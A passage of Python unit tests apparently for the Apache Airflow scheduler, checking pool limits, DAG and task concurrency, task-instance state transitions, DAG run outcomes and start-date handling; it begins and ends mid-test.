        TI(task1, dr2.execution_date),
        TI(task2, dr2.execution_date)
    ])
    for ti in tis:
        ti.state = State.SCHEDULED
        session.merge(ti)
    pool = models.Pool(pool='a', slots=1, description='haha')
    pool2 = models.Pool(pool='b', slots=100, description='haha')
    session.add(pool)
    session.add(pool2)
    session.commit()

    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    session.commit()
    # 1 TI from pool 'a' (1 slot) + both TIs from pool 'b'
    self.assertEqual(3, len(res))
    res_keys = []
    for ti in res:
        res_keys.append(ti.key)
    self.assertIn(tis[0].key, res_keys)
    self.assertIn(tis[1].key, res_keys)
    self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
    """
    A TI assigned to a pool that does not exist must not be returned as
    executable.
    """
    dag_id = 'SchedulerJobTest.test_nonexistent_pool'
    task_id = 'dummy_wrong_pool'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    dr = scheduler.create_dag_run(dag)

    ti = TI(task, dr.execution_date)
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()

    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)
    session.commit()
    self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
    """
    With no TI in a schedulable state, _find_executable_task_instances
    must return an empty result.
    """
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    scheduler.create_dag_run(dag)
    session.commit()

    self.assertEqual(0, len(scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)))
def test_find_executable_task_instances_concurrency(self):
    """
    _find_executable_task_instances must enforce the dag-level concurrency
    limit: with concurrency=2 and one TI already RUNNING only one more is
    returned, and none once two are RUNNING.
    """
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)

    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task1, dr2.execution_date)
    ti3 = TI(task1, dr3.execution_date)
    ti1.state = State.RUNNING
    ti2.state = State.SCHEDULED
    ti3.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)

    session.commit()

    # one slot left (1 RUNNING of 2 allowed) -> exactly one TI returned
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)

    self.assertEqual(1, len(res))
    # materialize a list: a map() object is a one-shot iterator on
    # Python 3, so membership tests against it are unreliable
    res_keys = [ti.key for ti in res]
    self.assertIn(ti2.key, res_keys)

    ti2.state = State.RUNNING
    session.merge(ti2)
    session.commit()

    # concurrency exhausted (2 RUNNING) -> nothing returned
    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)

    self.assertEqual(0, len(res))
def test_find_executable_task_instances_task_concurrency(self):
    """
    _find_executable_task_instances must enforce per-task concurrency:
    task1 has task_concurrency=2, so at most 2 of its TIs may be running
    at once, while task2 is unconstrained.
    """
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
    task_id_1 = 'dummy'
    task_id_2 = 'dummy2'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
    task2 = DummyOperator(dag=dag, task_id=task_id_2)
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)

    # both scheduled, nothing running yet -> both returned
    ti1_1 = TI(task1, dr1.execution_date)
    ti2 = TI(task2, dr1.execution_date)

    ti1_1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti2)
    session.commit()

    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)

    self.assertEqual(2, len(res))

    # one task1 TI running (1 of 2 slots) -> one more task1 TI allowed
    ti1_1.state = State.RUNNING
    ti2.state = State.RUNNING
    ti1_2 = TI(task1, dr2.execution_date)
    ti1_2.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti2)
    session.merge(ti1_2)
    session.commit()

    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)

    self.assertEqual(1, len(res))

    # two task1 TIs running (limit reached) -> no more task1 TIs
    ti1_2.state = State.RUNNING
    ti1_3 = TI(task1, dr3.execution_date)
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()

    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)

    self.assertEqual(0, len(res))

    # all three scheduled, none running -> capped at task_concurrency=2
    ti1_1.state = State.SCHEDULED
    ti1_2.state = State.SCHEDULED
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()

    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)

    self.assertEqual(2, len(res))

    # one running, two scheduled -> only one slot remains
    ti1_1.state = State.RUNNING
    ti1_2.state = State.SCHEDULED
    ti1_3.state = State.SCHEDULED
    session.merge(ti1_1)
    session.merge(ti1_2)
    session.merge(ti1_3)
    session.commit()

    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)

    self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
    """An empty TI list must produce an empty result."""
    scheduler = SchedulerJob()
    session = settings.Session()
    queued = scheduler._change_state_for_executable_task_instances(
        [], [State.NONE], session)
    self.assertEqual(0, len(queued))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
    """
    When none of the given TIs is in an acceptable state (all SCHEDULED,
    but only RUNNING accepted), nothing is changed or returned.
    """
    dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)

    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task1, dr2.execution_date)
    ti3 = TI(task1, dr3.execution_date)
    ti1.state = State.SCHEDULED
    ti2.state = State.SCHEDULED
    ti3.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)

    session.commit()

    res = scheduler._change_state_for_executable_task_instances(
        [ti1, ti2, ti3],
        [State.RUNNING],
        session)
    self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
    """
    TIs in an accepted state (None or SCHEDULED) are moved to QUEUED and
    returned; the QUEUED one (ti2) is filtered out.
    """
    dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr3 = scheduler.create_dag_run(dag)

    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task1, dr2.execution_date)
    ti3 = TI(task1, dr3.execution_date)
    ti1.state = State.SCHEDULED
    ti2.state = State.QUEUED
    ti3.state = State.NONE
    session.merge(ti1)
    session.merge(ti2)
    session.merge(ti3)

    session.commit()

    res = scheduler._change_state_for_executable_task_instances(
        [ti1, ti2, ti3],
        [State.NONE, State.SCHEDULED],
        session)
    self.assertEqual(2, len(res))
    ti1.refresh_from_db()
    ti3.refresh_from_db()
    self.assertEqual(State.QUEUED, ti1.state)
    self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
    """Queued task instances are handed to the executor via queue_command."""
    dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task = DummyOperator(dag=dag, task_id='dummy')
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    run = scheduler.create_dag_run(dag)
    ti = TI(task, run.execution_date)
    session.merge(ti)
    session.commit()
    with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
        scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti])
        mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
    """With an empty SimpleDagBag no task instance is executed."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
    task = DummyOperator(dag=dag, task_id='dummy')
    # Deliberately empty bag: the SCHEDULED instance below must be ignored.
    dagbag = SimpleDagBag([])
    scheduler = SchedulerJob()
    session = settings.Session()
    run = scheduler.create_dag_run(dag)
    ti = TI(task, run.execution_date)
    ti.state = State.SCHEDULED
    session.merge(ti)
    session.commit()
    self.assertEqual(
        0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
    """Queue only as many task instances as the dag's concurrency allows."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances'
    task_id_1 = 'dummy_task'
    task_id_2 = 'dummy_task_nonexistent_queue'
    # important that len(tasks) is less than concurrency
    # because before scheduler._execute_task_instances would only
    # check the num tasks once so if concurrency was 3,
    # we could execute arbitrarily many tasks in the second run
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    task2 = DummyOperator(dag=dag, task_id=task_id_2)
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    session = settings.Session()
    # create first dag run with 1 running and 1 queued
    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, dr1.execution_date)
    ti2 = TI(task2, dr1.execution_date)
    ti1.refresh_from_db()
    ti2.refresh_from_db()
    ti1.state = State.RUNNING
    ti2.state = State.RUNNING
    session.merge(ti1)
    session.merge(ti2)
    session.commit()
    self.assertEqual(State.RUNNING, dr1.state)
    self.assertEqual(2, DAG.get_num_task_instances(dag_id, dag.task_ids,
                                                   states=[State.RUNNING], session=session))
    # create second dag run
    dr2 = scheduler.create_dag_run(dag)
    ti3 = TI(task1, dr2.execution_date)
    ti4 = TI(task2, dr2.execution_date)
    ti3.refresh_from_db()
    ti4.refresh_from_db()
    # manually set to scheduled so we can pick them up
    ti3.state = State.SCHEDULED
    ti4.state = State.SCHEDULED
    session.merge(ti3)
    session.merge(ti4)
    session.commit()
    self.assertEqual(State.RUNNING, dr2.state)
    res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    # check that concurrency is respected: 2 RUNNING already, concurrency=3,
    # so only one of the two SCHEDULED instances may be moved to QUEUED
    ti1.refresh_from_db()
    ti2.refresh_from_db()
    ti3.refresh_from_db()
    ti4.refresh_from_db()
    self.assertEqual(3, DAG.get_num_task_instances(dag_id, dag.task_ids,
                                                   states=[State.RUNNING, State.QUEUED], session=session))
    self.assertEqual(State.RUNNING, ti1.state)
    self.assertEqual(State.RUNNING, ti2.state)
    # exactly one of ti3/ti4 got queued, the other stayed scheduled
    six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
    self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
    """max_tis_per_query is a per-query batch size, not a cap on the total
    number of task instances queued in one pass."""
    dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
    # important that len(tasks) is less than concurrency
    # because before scheduler._execute_task_instances would only
    # check the num tasks once so if concurrency was 3,
    # we could execute arbitrarily many tasks in the second run
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id='dummy_task')
    task2 = DummyOperator(dag=dag, task_id='dummy_task_2')
    dagbag = self._make_simple_dag_bag([dag])
    scheduler = SchedulerJob()
    scheduler.max_tis_per_query = 3
    session = settings.Session()
    # 4 dag runs x 2 tasks = 8 SCHEDULED instances, batched 3 at a time.
    tis = []
    for _ in range(4):
        run = scheduler.create_dag_run(dag)
        for task in (task1, task2):
            ti = TI(task, run.execution_date)
            tis.append(ti)
            ti.refresh_from_db()
            ti.state = State.SCHEDULED
            session.merge(ti)
    session.commit()
    res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    self.assertEqual(8, res)
    for ti in tis:
        ti.refresh_from_db()
        self.assertEqual(State.QUEUED, ti.state)
def test_change_state_for_tis_without_dagrun(self):
    """TIs whose dag run is missing or no longer RUNNING are reset to the
    new state; TIs belonging to healthy RUNNING dag runs are untouched.

    FIX: replaced deprecated ``assertEquals`` with ``assertEqual``.
    """
    dag1 = DAG(
        dag_id='test_change_state_for_tis_without_dagrun',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag1,
        owner='airflow')
    DummyOperator(
        task_id='dummy_b',
        dag=dag1,
        owner='airflow')
    dag2 = DAG(
        dag_id='test_change_state_for_tis_without_dagrun_dont_change',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag2,
        owner='airflow')
    dag3 = DAG(
        dag_id='test_change_state_for_tis_without_dagrun_no_dagrun',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag3,
        owner='airflow')
    session = settings.Session()
    dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
                             state=State.RUNNING,
                             execution_date=DEFAULT_DATE,
                             start_date=DEFAULT_DATE,
                             session=session)
    dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
                             state=State.RUNNING,
                             execution_date=DEFAULT_DATE,
                             start_date=DEFAULT_DATE,
                             session=session)
    ti1a = dr1.get_task_instance(task_id='dummy', session=session)
    ti1a.state = State.SCHEDULED
    ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
    ti1b.state = State.SUCCESS
    session.commit()
    ti2 = dr2.get_task_instance(task_id='dummy', session=session)
    ti2.state = State.SCHEDULED
    session.commit()
    # ti3 has no dag run at all (dag3 never got one)
    ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
    ti3.state = State.SCHEDULED
    session.merge(ti3)
    session.commit()
    dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
    scheduler = SchedulerJob(num_runs=0, run_duration=0)
    scheduler._change_state_for_tis_without_dagrun(
        simple_dag_bag=dagbag,
        old_states=[State.SCHEDULED, State.QUEUED],
        new_state=State.NONE,
        session=session)
    # dr1 and dr2 are RUNNING -> their TIs keep their states
    ti1a = dr1.get_task_instance(task_id='dummy', session=session)
    ti1a.refresh_from_db(session=session)
    self.assertEqual(ti1a.state, State.SCHEDULED)
    ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
    ti1b.refresh_from_db(session=session)
    self.assertEqual(ti1b.state, State.SUCCESS)
    ti2 = dr2.get_task_instance(task_id='dummy', session=session)
    ti2.refresh_from_db(session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
    # ti3 has no dag run -> reset to NONE
    ti3.refresh_from_db(session=session)
    self.assertEqual(ti3.state, State.NONE)
    # fail dr1: its SCHEDULED TI must now be reset as well
    dr1.refresh_from_db(session=session)
    dr1.state = State.FAILED
    # why o why
    session.merge(dr1)
    session.commit()
    scheduler._change_state_for_tis_without_dagrun(
        simple_dag_bag=dagbag,
        old_states=[State.SCHEDULED, State.QUEUED],
        new_state=State.NONE,
        session=session)
    ti1a.refresh_from_db(session=session)
    self.assertEqual(ti1a.state, State.NONE)
    # don't touch ti1b
    ti1b.refresh_from_db(session=session)
    self.assertEqual(ti1b.state, State.SUCCESS)
    # don't touch ti2
    ti2.refresh_from_db(session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
def test_execute_helper_reset_orphaned_tasks(self):
    """_execute_helper resets orphaned SCHEDULED TIs of scheduler-owned dag
    runs to NONE, but leaves backfill-owned dag runs alone."""
    session = settings.Session()
    dag = DAG(
        'test_execute_helper_reset_orphaned_tasks',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'})
    with dag:
        op1 = DummyOperator(task_id='op1')
    dag.clear()
    # scheduler-owned run (DagRun.ID_PREFIX run_id)
    dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE,
                           session=session)
    # backfill-owned run (BackfillJob.ID_PREFIX): must NOT be reset
    dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
                            state=State.RUNNING,
                            execution_date=DEFAULT_DATE + datetime.timedelta(1),
                            start_date=DEFAULT_DATE,
                            session=session)
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    ti.state = State.SCHEDULED
    ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
    ti2.state = State.SCHEDULED
    session.commit()
    processor = mock.MagicMock()
    # no prior processor run, so the helper starts fresh
    processor.get_last_finish_time.return_value = None
    scheduler = SchedulerJob(num_runs=0, run_duration=0)
    executor = TestExecutor()
    scheduler.executor = executor
    scheduler._execute_helper(processor_manager=processor)
    # scheduler-owned TI was reset ...
    ti = dr.get_task_instance(task_id=op1.task_id, session=session)
    self.assertEqual(ti.state, State.NONE)
    # ... backfill-owned TI kept its state
    ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
    self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
        self,
        dag_id,
        expected_task_states,  # dict of task_id: state
        dagrun_state,
        run_kwargs=None,
        advance_execution_date=False,
        session=None):
    """
    Helper for testing DagRun states with simple two-task DAGS.
    This is hackish: a dag run is created but its tasks are
    run by a backfill.

    :param dag_id: id of a dag available in self.dagbag
    :param expected_task_states: dict of task_id: expected terminal state
    :param dagrun_state: expected DagRun state after the backfill
    :param run_kwargs: extra keyword args forwarded to dag.run()
    :param advance_execution_date: evaluate a second, later dag run
    :param session: injected by @provide_session
    """
    if run_kwargs is None:
        run_kwargs = {}
    scheduler = SchedulerJob()
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    if advance_execution_date:
        # run a second time to schedule a dagrun after the start_date
        dr = scheduler.create_dag_run(dag)
    ex_date = dr.execution_date
    try:
        dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
    except AirflowException:
        # failing tasks raise; the assertions below verify final states
        pass
    # test tasks
    for task_id, expected_state in expected_task_states.items():
        task = dag.get_task(task_id)
        ti = TI(task, ex_date)
        ti.refresh_from_db()
        self.assertEqual(ti.state, expected_state)
    # load dagrun
    dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
    dr = dr[0]
    dr.dag = dag
    self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
    """
    DagRuns with one failed and one incomplete root task -> FAILED
    """
    expected = {
        'test_dagrun_fail': State.FAILED,
        'test_dagrun_succeed': State.UPSTREAM_FAILED,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_fail',
        expected_task_states=expected,
        dagrun_state=State.FAILED)
def test_dagrun_success(self):
    """
    DagRuns with one failed and one successful root task -> SUCCESS
    """
    expected = {
        'test_dagrun_fail': State.FAILED,
        'test_dagrun_succeed': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_success',
        expected_task_states=expected,
        dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
    """
    DagRuns with one successful and one failed root task -> FAILED
    """
    expected = {
        'test_dagrun_succeed': State.SUCCESS,
        'test_dagrun_fail': State.FAILED,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_root_fail',
        expected_task_states=expected,
        dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
    """
    DagRuns with one unfinished and one failed root task -> RUNNING
    """
    # Run both the failed and successful tasks
    scheduler = SchedulerJob()
    dag_id = 'test_dagrun_states_root_fail_unfinished'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    try:
        dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
    except AirflowException:  # Expect an exception since there is a failed task
        pass
    # Mark the successful task as never having run since we want to see if the
    # dagrun will be in a running state despite having an unfinished task.
    session = settings.Session()
    ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
    ti.state = State.NONE
    session.commit()
    dr_state = dr.update_state()
    self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
    """
    DagRun is marked a success if ignore_first_depends_on_past=True

    Test that an otherwise-deadlocked dagrun is marked as a success
    if ignore_first_depends_on_past=True and the dagrun execution_date
    is after the start_date.
    """
    expected = {
        'test_depends_on_past': State.SUCCESS,
        'test_depends_on_past_2': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_deadlock',
        expected_task_states=expected,
        dagrun_state=State.SUCCESS,
        advance_execution_date=True,
        run_kwargs={'ignore_first_depends_on_past': True})
def test_dagrun_deadlock_ignore_depends_on_past(self):
    """
    Test that ignore_first_depends_on_past doesn't affect results
    (this is the same test as
    test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
    that start_date == execution_date so depends_on_past is irrelevant).
    """
    expected = {
        'test_depends_on_past': State.SUCCESS,
        'test_depends_on_past_2': State.SUCCESS,
    }
    self.evaluate_dagrun(
        dag_id='test_dagrun_states_deadlock',
        expected_task_states=expected,
        dagrun_state=State.SUCCESS,
        run_kwargs={'ignore_first_depends_on_past': True})
def test_scheduler_start_date(self):
    """
    Test that the scheduler respects start_dates, even when DAGS have run
    """
    dag_id = 'test_start_date_scheduling'
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()
    # sanity: this dag's start_date lies in the future relative to DEFAULT_DATE
    self.assertTrue(dag.start_date > DEFAULT_DATE)
    scheduler = SchedulerJob(dag_id,
                             num_runs=2)
    scheduler.run()
    # zero tasks ran
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
    # previously, running this backfill would kick off the Scheduler
    # because it would take the most recent run and start from there
    # That behavior still exists, but now it will only do so if after the
    # start date
    backfill = BackfillJob(
        dag=dag,
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE)
    backfill.run()
    # one task ran
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
    scheduler = SchedulerJob(dag_id,
                             num_runs=2)
    scheduler.run()
    # still one task: the scheduler must not add runs before start_date
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_scheduler_multiprocessing(self):
    """
    Test that the scheduler can successfully queue multiple dags in parallel
    """
    dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
    for each_id in dag_ids:
        self.dagbag.get_dag(each_id).clear()
    scheduler = SchedulerJob(dag_ids=dag_ids, num_runs=2)
    scheduler.run()
    # zero tasks ran for the dag whose start_date is in the future
    dag_id = 'test_start_date_scheduling'
    session = settings.Session()
    self.assertEqual(
        len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
    """
    Test if the scheduler does not create multiple dagruns
    if a dag is scheduled with @once and a start_date
    """
    dag = DAG(
        'test_scheduler_dagrun_once',
        start_date=timezone.datetime(2015, 1, 1),
        schedule_interval="@once")
    dag.clear()
    scheduler = SchedulerJob()
    # the first call creates the single run ...
    self.assertIsNotNone(scheduler.create_dag_run(dag))
    # ... any further call must not create another
    self.assertIsNone(scheduler.create_dag_run(dag))
def test_scheduler_process_task_instances(self):
    """
    Test if _process_task_instances puts the right task instances into the
    queue.
    """
    dag = DAG(
        dag_id='test_scheduler_process_execute_task',
        start_date=DEFAULT_DATE)
    dag_task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    session.merge(DagModel(dag_id=dag.dag_id))
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    self.assertIsNotNone(scheduler.create_dag_run(dag))
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    # exactly this (dag, task, execution_date) key must have been queued
    queue.append.assert_called_with(
        (dag.dag_id, dag_task1.task_id, DEFAULT_DATE)
    )
def test_scheduler_do_not_schedule_removed_task(self):
    """A task removed from the dag must not be scheduled for an
    existing dag run.

    FIX: the scheduler appends to the queue (see
    test_scheduler_process_task_instances asserting on ``queue.append``),
    so the original ``queue.put.assert_not_called()`` was vacuous --
    ``put`` is never used and the assertion could never fail.
    """
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_removed_task',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # re-create the dag WITHOUT the task; the dag run above still exists
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_removed_task',
        start_date=DEFAULT_DATE)
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    queue.append.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
    """No dag run (and no queued task) is created before the dag's
    start_date.

    FIX: the scheduler appends to the queue, so the original
    ``queue.put.assert_not_called()`` was vacuous; assert on the method
    actually used.
    """
    dag = DAG(
        dag_id='test_scheduler_do_not_schedule_too_early',
        start_date=timezone.datetime(2200, 1, 1))
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    # start_date is in the year 2200 -> no run may be created
    dr = scheduler.create_dag_run(dag)
    self.assertIsNone(dr)
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    queue.append.assert_not_called()
def test_scheduler_do_not_run_finished(self):
    """Task instances already in SUCCESS state are not queued again.

    FIX: the scheduler appends to the queue, so the original
    ``queue.put.assert_not_called()`` was vacuous; assert on the method
    actually used.
    """
    dag = DAG(
        dag_id='test_scheduler_do_not_run_finished',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # mark every instance of the run as already finished
    tis = dr.get_task_instances(session=session)
    for ti in tis:
        ti.state = State.SUCCESS
    session.commit()
    session.close()
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    queue.append.assert_not_called()
def test_scheduler_add_new_task(self):
    """
    Test if a task instance will be added if the dag is updated.

    FIX: replaced deprecated ``assertEquals`` with ``assertEqual``.
    """
    dag = DAG(
        dag_id='test_scheduler_add_new_task',
        start_date=DEFAULT_DATE)
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    orm_dag = DagModel(dag_id=dag.dag_id)
    session.merge(orm_dag)
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    dr = scheduler.create_dag_run(dag)
    self.assertIsNotNone(dr)
    # the run starts out with a single task instance
    tis = dr.get_task_instances()
    self.assertEqual(len(tis), 1)
    # add a second task to the dag after the run was created
    DummyOperator(
        task_id='dummy2',
        dag=dag,
        owner='airflow')
    queue = Mock()
    scheduler._process_task_instances(dag, queue=queue)
    # processing the dag creates the missing task instance
    tis = dr.get_task_instances()
    self.assertEqual(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
    """
    Test if a dagrun will not be scheduled if max_dag_runs has been reached
    """
    dag = DAG(
        dag_id='test_scheduler_verify_max_active_runs',
        start_date=DEFAULT_DATE)
    dag.max_active_runs = 1
    DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')
    session = settings.Session()
    session.merge(DagModel(dag_id=dag.dag_id))
    session.commit()
    session.close()
    scheduler = SchedulerJob()
    dag.clear()
    # first run is created ...
    self.assertIsNotNone(scheduler.create_dag_run(dag))
    # ... a second one is refused while the first is still active
    self.assertIsNone(scheduler.create_dag_run(dag))
def test_scheduler_fail_dagrun_timeout(self):
    """
    Test if a dagrun will be set failed if it exceeds dagrun_timeout.

    FIX: replaced deprecated ``assertEquals`` with ``assertEqual``.
    """
    dag = DAG(
        dag_id='test_scheduler_fail_dagrun_timeout',
        start_date=DEFAULT_DATE)
    dag.dagrun_timeout = datetime.timedelta(seconds=60)
